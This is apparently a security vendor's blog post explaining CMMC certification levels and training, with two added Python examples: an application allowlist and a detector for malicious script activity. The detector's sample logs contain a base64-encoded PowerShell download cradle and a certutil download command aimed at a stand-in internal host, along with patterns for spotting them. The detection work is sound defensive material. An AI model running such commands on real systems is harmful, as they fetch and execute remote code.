Cybersecurity is a crucial concern for every business in the world. No matter the kind or size of organization, it’s always imperative to safeguard against cybercrime to prevent loss of sensitive information and other related risks, such as theft and extortion. The threats posed by hackers and other bad actors are even more significant when it comes to matters of national security.
That’s why all contractors with the United States Department of Defense (DoD) are held to stringent cybersecurity standards. The newest version of those requirements, the Cybersecurity Maturity Model Certification (CMMC), will require many contractors to rework their cybersecurity programs. Most of all, it’ll require training for all stakeholders.
This guide will walk through how to get that CMMC certification training off the ground.
How to Conduct CMMC Employee Training
Knowledge is power. As with the rollout of any new requirement, the most important aspect of compliance with CMMC will be intensive training that instills a deep knowledge of its requirements across your organization.
Every individual in a position to impact or influence your organization’s cyberdefense systems needs to have a solid grasp of:
- What CMMC requires and what changes need to be made
- The current cybersecurity measures and needs of the company
First and foremost, a deep theoretical and practical understanding of what CMMC is and what it requires must be instilled in all decision makers. Then, to ascertain the cybersecurity profile of your company, internal or external analysis of all strengths and weaknesses is necessary.
Finally, company-wide and targeted programs like required reading and workshops transmit this practical knowledge to all staff and stakeholders, cultivating a culture of learning.
A corporate culture that prizes learning is one that prizes safety.
But before learning how to implement CMMC, let’s look at what it is on a fundamental level.
Basic Overview: What is CMMC?
The CMMC was created to better secure the DoD from attacks on its supply chain and the entire Defense Industrial Base (DIB) sector. This sector includes over 300,000 businesses across various industries. All of these organizations support the DoD, and the security of every American citizen, through research, development and delivery of defense systems and services.
All DoD operations depend upon the security of its sensitive data.
Specifically, one of the biggest focuses of the CMMC is the protection of extremely sensitive and important forms of unclassified information. The two main types are:
- Federal contract information (FCI) – All information that was created by or for the federal government under contract but is not intended for public use or access.
- Controlled unclassified information (CUI) – Sensitive information that is legally required to be protected, but not specifically labeled “classified,” including:
- Critical infrastructure
- International agreements
- Procurement and acquisition
- Natural and cultural resources
- Proprietary business information
All DoD contractors must ensure the basic safeguarding of all FCI, per Federal Acquisition Regulation (FAR) clause 52.204-21. Contractors that handle CUI must also meet the security requirements of NIST SP 800-171, per Defense Federal Acquisition Regulation Supplement (DFARS) clause 252.204-7012.
Under CMMC, a contractor’s compliance is no longer self-attested: it must be assessed and certified by a certified third party assessment organization (C3PAO).
Instilling this basic knowledge of CMMC will enable everyone in your company to…
Develop a Deep Understanding of CMMC Requirements
The CMMC is a framework that measures the overall effectiveness of your organization’s cybersecurity across a set of practices (the controls you implement) and processes (how consistently and maturely you manage them). The practices are grouped into 17 domains (Access Control, Incident Response, and so on), and practices and processes together form cumulative “levels” of maturity.
There are five levels in total, and each one builds on the last:
- Performed processes, basic cyber hygiene practices
- Documented processes, intermediate cyber hygiene practices
- Managed processes, good cyber hygiene practices
- Reviewed processes, proactive practices
- Optimizing processes, advanced/progressive practices
An organization that has achieved level five will, by definition, also satisfy levels one through four.
Alternatively, another way to conceptualize these levels is by understanding their target outcomes as they build upon each other:
- Level 1: Safeguarding all FCI
- Level 2: Transitioning to protection for CUI
- Level 3: Fully protecting all CUI
- Levels 4-5: Protecting CUI and reducing the risk of advanced persistent threats (APTs)
Now, let’s go over the actual requirements for each level:
CMMC Level 1: Basic Cyber Hygiene and Performance
The requirements for the first level are:
- Practices: Basic Cyber Hygiene – The practices required for this level correspond to the “Basic Safeguarding of Covered Contractor Information Systems” laid out in 48 CFR 52.204-21. Some examples include:
- Identification and Authentication (IA) 1.076: Identify information system users, processes acting on behalf of users, or devices
- Access Control (AC) 1.001: Limit information system access to authorized users, processes acting on behalf of authorized users, or devices (including other information systems)
- Media Protection (MP) 1.118: Sanitize or destroy information system media containing FCI before disposal or release for reuse
- Processes: Performed – At this level, the practices are merely required to be performed, and process maturity as such is not measured. This accommodates the fact that the practices required are ad-hoc and not measurable on a consistent basis.
Level one is the simplest and most basic level. It introduces 17 practices, but there is no measured assessment of the process maturity yet; that kicks in at level two.
CMMC Level 2: Intermediate Cyber Hygiene and Documentation
The requirements for the second level are:
- Practices: Intermediate Cyber Hygiene – These practices guide the progression out of level one and into level three. Developed from the core of NIST SP 800-171 and other standards, they include the following:
- Recovery (RE) 2.137: Regularly perform and test data backups
- Personnel Security (PS) 2.127: Screen all individuals given access to CUI
- Processes: Documented – At this stage organizations are required to not only perform all required practices of each level, but also document these developments thoroughly.
This level introduces measures for process maturity, as well as an additional 55 practices. However, as noted above, this level is intended as a transitional level preparing for level three.
CMMC Level 3: Good Cyber Hygiene and Management
The requirements for the third level are:
- Practices: Good Cyber Hygiene – This level completes the protection of CUI, covering all 110 security requirements of NIST SP 800-171 plus 20 additional practices drawn from other sources. These practices include:
- Asset Management (AM) 3.036: Establish clear, consistent definitions for all procedures related to handling of CUI
- Awareness and Training (AT) 3.058: Train personnel on specific indicators and solutions for threats from within the organization
- Processes: Managed – At this maturity level, all practices are not only documented, but also carefully and actively managed. The organization must produce a plan for management for all cybersecurity practices.
Level three completes the entirety of the NIST SP 800-171 requirements, adding 58 practices for a total of 130. At this stage, the “hygiene” elements are complete, and your organization is ready for more advanced, proactive cyberdefenses.
CMMC Level 4: Proactivity and Review
The requirements for the fourth level are:
- Practices: Proactive – Moving beyond the standard protections detailed in the previous levels, level four begins to implement defenses against APTs. These include enhanced requirements from Draft NIST SP 800-171B and other best practices. Some include:
- Configuration Management (CM) 4.073: Employ application whitelisting and an application vetting process for systems identified by the organization
- Incident Response (IR) 4.100: Use knowledge of attacker tactics, techniques and procedures in incident response planning and execution
- Processes: Reviewed – At this stage the organization must move beyond basic management of all practices and review their effectiveness on a recurring basis. In addition, corrective action must be taken where necessary.
Level four introduces 26 additional practices that draw on threat-informed sources above and beyond the NIST SP 800-171 baseline. These practices set the stage for an ongoing process of optimization, bridging into…
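The CM.4.073 practice above pairs two things: a vetting step (someone reviews a binary and approves it) and enforcement (only approved binaries run). The following is an added example, not code from the original article or from CMMC itself, of why hash-based allowlisting matters: an allowlist keyed only on file path can be bypassed by replacing the file, while recording the digest at vetting time catches both unvetted and tampered binaries. The manifest format, file names and contents are assumptions constructed for the example.

```python
"""Added example (not from the original article): a hash-based application
allowlist in the spirit of CMMC practice CM.4.073 (application vetting and
whitelisting). The manifest format and sample file names are assumptions."""
import hashlib
import os
import tempfile


def sha256_file(path):
    """Stream the file through SHA-256 so large binaries do not load into memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(vetted_paths):
    """Vetting step: record the digest of each reviewed binary at approval time.

    The manifest maps absolute path -> SHA-256 hex digest. Anything not in it
    is, by definition, unvetted."""
    return {os.path.abspath(p): sha256_file(p) for p in vetted_paths}


def check_execution(path, manifest):
    """Enforcement step. Returns (allowed, reason).

    The path alone is never trusted: the file content must still match the
    digest captured when the binary was vetted."""
    abs_path = os.path.abspath(path)
    expected = manifest.get(abs_path)
    if expected is None:
        return False, "not on allowlist"
    actual = sha256_file(abs_path)
    if actual != expected:
        return False, "digest mismatch (binary changed since vetting)"
    return True, "vetted binary"


def demo():
    """Exercise the three cases: vetted, unvetted, and tampered-after-vetting.

    Files are constructed in a temporary directory; they are not real
    executables, only stand-ins for the example."""
    with tempfile.TemporaryDirectory() as d:
        good = os.path.join(d, "inventory.exe")
        other = os.path.join(d, "unknown.exe")
        with open(good, "wb") as f:
            f.write(b"MZ vetted inventory tool v1")
        with open(other, "wb") as f:
            f.write(b"MZ unreviewed tool")

        manifest = build_manifest([good])  # only inventory.exe was vetted
        results = {
            "vetted": check_execution(good, manifest)[0],
            "unvetted": check_execution(other, manifest)[0],
        }
        # Simulate an attacker replacing the vetted binary in place.
        with open(good, "wb") as f:
            f.write(b"MZ vetted inventory tool v1 + injected payload")
        results["tampered"] = check_execution(good, manifest)[0]
    return results


if __name__ == "__main__":
    for case, allowed in demo().items():
        print(f"{case}: {'allowed' if allowed else 'blocked'}")
```

In production the enforcement point is the operating system’s own policy engine (for example AppLocker or Windows Defender Application Control on Windows), not a script; the value of the example is in showing that the allowlist must be tied to vetted content, and that the manifest must be rebuilt whenever a vetted application is updated.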
CMMC Level 5: Advanced, Progressive, and Optimized
The requirements for the fifth level are:
- Practices: Advanced/Progressive – These practices further harden the protection of CUI against existing and emerging APTs. They include:
- System and Communications Protection (SC) 5.198: Configure monitoring systems to record packets passing through the organization’s Internet boundaries and other organization-defined boundaries
- System and Information Integrity (SI) 5.222: Analyze system behavior to detect and mitigate the execution of normal and abnormal commands and scripts that indicate malicious actions
- Processes: Optimizing – This final maturity level involves an ongoing process of optimization, including all of the above processes as well as organization-wide implementation. Hence the importance of training.
Level five introduces 15 additional practices, bringing the running total up to 171 practices for full-fledged process maturity. However, this figure is subject to change over time, as the practices that are considered advanced today may become simply baseline practices tomorrow. As technology develops, attacks become increasingly sophisticated.
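The SI.5.222 practice above asks for analysis of command and script execution that separates normal activity from abnormal, malicious use. The following is an added example, not code from the original article or from CMMC itself, of what a minimal version of that analysis looks like: it runs over constructed process-creation log lines, decodes PowerShell -EncodedCommand payloads (which are base64 over UTF-16LE), flags a handful of well-known abuse patterns (download cradles, hidden windows, certutil used as a downloader) and treats a script interpreter spawned by an Office application as abnormal. The log format, the field layout, the baseline of “normal” parents and the indicator list are all assumptions for the example; a real deployment would take its baseline from the organization’s own telemetry.

```python
"""Added example (not from the original article): a small detector in the spirit
of CMMC practice SI.5.222. Log format, field names, baseline and indicator list
are assumptions made for this example."""
import base64
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed payload and log lines (not captured from any real system).
# Assumed log format: timestamp|host|user|parent_image|command_line
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5/a')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16le")).decode()
SAMPLE_LOG = "\n".join([
    r'2021-03-04T09:12:01Z|WS-114|jdoe|explorer.exe|"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" /n "C:\Users\jdoe\Documents\contract.docx"',
    f"2021-03-04T09:12:44Z|WS-114|jdoe|WINWORD.EXE|powershell.exe -nop -w hidden -enc {ENCODED}",
    r"2021-03-04T09:15:10Z|WS-114|SYSTEM|services.exe|powershell.exe -ExecutionPolicy Bypass -File C:\ProgramData\Inventory\collect.ps1",
    r"2021-03-04T09:20:33Z|WS-207|mlee|cmd.exe|certutil.exe -urlcache -split -f http://10.0.0.5/x.exe x.exe",
    r"2021-03-04T09:21:02Z|WS-207|mlee|explorer.exe|notepad.exe C:\Users\mlee\notes.txt",
])

# Indicators of abnormal script use. Each is a (pattern, label) pair; the
# pattern is matched against the command line plus any decoded payload.
INDICATORS = [
    (re.compile(r"\bIEX\b|Invoke-Expression", re.I), "Invoke-Expression of generated code"),
    (re.compile(r"Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest", re.I), "download cradle"),
    (re.compile(r"-(?:w|win|window|windowstyle)\s+hidden", re.I), "hidden window"),
    (re.compile(r"certutil(?:\.exe)?\s.*-urlcache", re.I), "certutil used as downloader"),
    (re.compile(r"\bmshta(?:\.exe)?\b|regsvr32(?:\.exe)?\s.*/i:http", re.I), "LOLBin script host"),
]
# Assumed baseline: these interpreters are normal when launched by services or
# the shell, abnormal when launched by an Office application (macro behaviour).
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


@dataclass
class Finding:
    timestamp: str
    host: str
    user: str
    command: str
    reasons: List[str] = field(default_factory=list)


def decode_encoded_command(command: str) -> Optional[str]:
    """Return the plaintext of a PowerShell -EncodedCommand argument, if present."""
    m = ENC_RE.search(command)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None  # malformed payload: treat as not decodable


def image_name(command: str) -> str:
    """First token of the command line, reduced to a lower-case file name."""
    m = re.match(r'"([^"]+)"|(\S+)', command)
    if not m:
        return ""
    return (m.group(1) or m.group(2)).rsplit("\\", 1)[-1].lower()


def analyze_line(line: str) -> Optional[Finding]:
    parts = line.split("|", 4)
    if len(parts) != 5:
        return None  # not in the assumed format; skip
    ts, host, user, parent, command = parts
    reasons: List[str] = []
    text = command
    decoded = decode_encoded_command(command)
    if decoded is not None:
        reasons.append("base64-encoded PowerShell command")
        text = command + " " + decoded  # inspect the decoded script too
    if image_name(command) in INTERPRETERS and parent.lower() in OFFICE_PARENTS:
        reasons.append(f"script interpreter spawned by Office application ({parent})")
    for pattern, label in INDICATORS:
        if pattern.search(text):
            reasons.append(label)
    return Finding(ts, host, user, command, reasons) if reasons else None


def analyze_log(log_text: str) -> List[Finding]:
    """Return one Finding per log line that shows abnormal script activity."""
    return [f for f in (analyze_line(l) for l in log_text.splitlines() if l.strip()) if f]


if __name__ == "__main__":
    for finding in analyze_log(SAMPLE_LOG):
        print(f"{finding.timestamp} {finding.host} {finding.user}: {', '.join(finding.reasons)}")
```

Two of the five constructed lines are flagged: the Word-spawned, hidden, encoded download cradle, and the certutil download; the scheduled inventory script run by services.exe is left alone even though it uses -ExecutionPolicy Bypass, which is the “normal commands” half of the practice. Decoding the payload before matching is the important design point: an indicator list that only looks at the raw command line sees nothing but base64.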
That’s why, in addition to understanding CMMC inside and out, you also need to have an in-depth knowledge of what cyberdefense looks like at your organization.
Assess Your Current Cybersecurity Situation
Compliance with the CMMC is far from the only cyberdefense concern facing your organization.
The CMMC mandate builds on the requirements and protocols of other existing standards, enhancing your overall cybersecurity profile. That said, compliance with and company-wide buy-in to CMMC requires a detailed knowledge of the existing cybersecurity situation.
This includes a detailed understanding of:
- Existing legal and industry-wide protocols
- The security controls already in place, and the vulnerabilities that remain
Once a knowledge base is established, dissemination of this information through training is possible. Through targeted testing and company-wide solutions like seminars and workshops, all personnel can be brought up to speed—once that speed is identified.
Other, Coexisting Protocols
Not all DoD contractors are the same. There are many different industries and companies that constitute and contribute to the DIB and DoD supply chain. And many of these individual companies sit at the intersection of several different networks of cybersecurity requirements.
Some of the other interlocking systems of protection you may need to abide by include:
- PCI DSS – If any part of your business involves receiving credit card payments for goods or services, you need to become PCI DSS compliant to reduce the threat of financial harm to you and all who come in contact with your business.
- NERC CIP – DoD contractors involved in the bulk power system (BPS) across North America must comply with the NERC CIP Reliability Standards to ensure the uninterrupted flow of power and prevent compromises to national security.
- HIPAA / HITECH – All DoD contractors who provide health care and health-adjacent services must ensure HIPAA and HITECH compliance for the process of how personal health information (PHI) is generated, processed, and stored.
All of these standards require controls similar to those specified above. In some cases they overlap. But overlap is not a problem in security; in fact, having multiple layers of defense is key to safeguarding your data from the ever-evolving methods of cybercriminals.
Compliance isn’t the end of cybersecurity; it’s just the beginning.
Know Your Strengths and Weaknesses
Compliance shows that the required controls are in place on paper. But the only way to truly know how safe your organization is? Testing your defenses.
And sometimes, the best defense is a strong offense.
That’s the mentality behind penetration testing (also known as pen testing). Pen testing is a form of ethical hacking that enables you to see:
- How an attacker could potentially enter your systems
- What points of entry (vulnerabilities) exist
- What an attacker could do once inside
- How quickly an attacker could gain full control
Knowing these vulnerabilities and points of weakness is the key to being able to patch them. That, in turn, is key to training and company-wide implementation of cybersecurity.
Certain cybersecurity standards require pen testing. But even where it isn’t required, pen testing is one of the best ways to shore up your cyberdefenses, because it reveals the weaknesses an attacker would actually use rather than the ones a checklist assumes.
For that and all other cybersecurity needs, we’re here to help.
Optimize Your Cybersecurity With RSI Security
In order to attain full CMMC compliance, training is one of the biggest challenges to overcome. To help prepare your organization for all changes it will require, RSI Security offers a comprehensive CMMC advisory services package. Our qualified experts will take care of CMMC certification training for you, walking through the implementation of all requirements detailed above.
But that’s not all.
RSI Security will be a C3PAO as soon as the certification process becomes available. So, we can get you ready for certification, then certify you once the next step is required.
In addition, RSI Security is your first and best option for overall cybersecurity optimization. That includes all other compliance programs noted above, as well as in-depth analysis and customized cyberdefense solutions tailor-made for your company.
For all your cybersecurity needs, contact RSI today!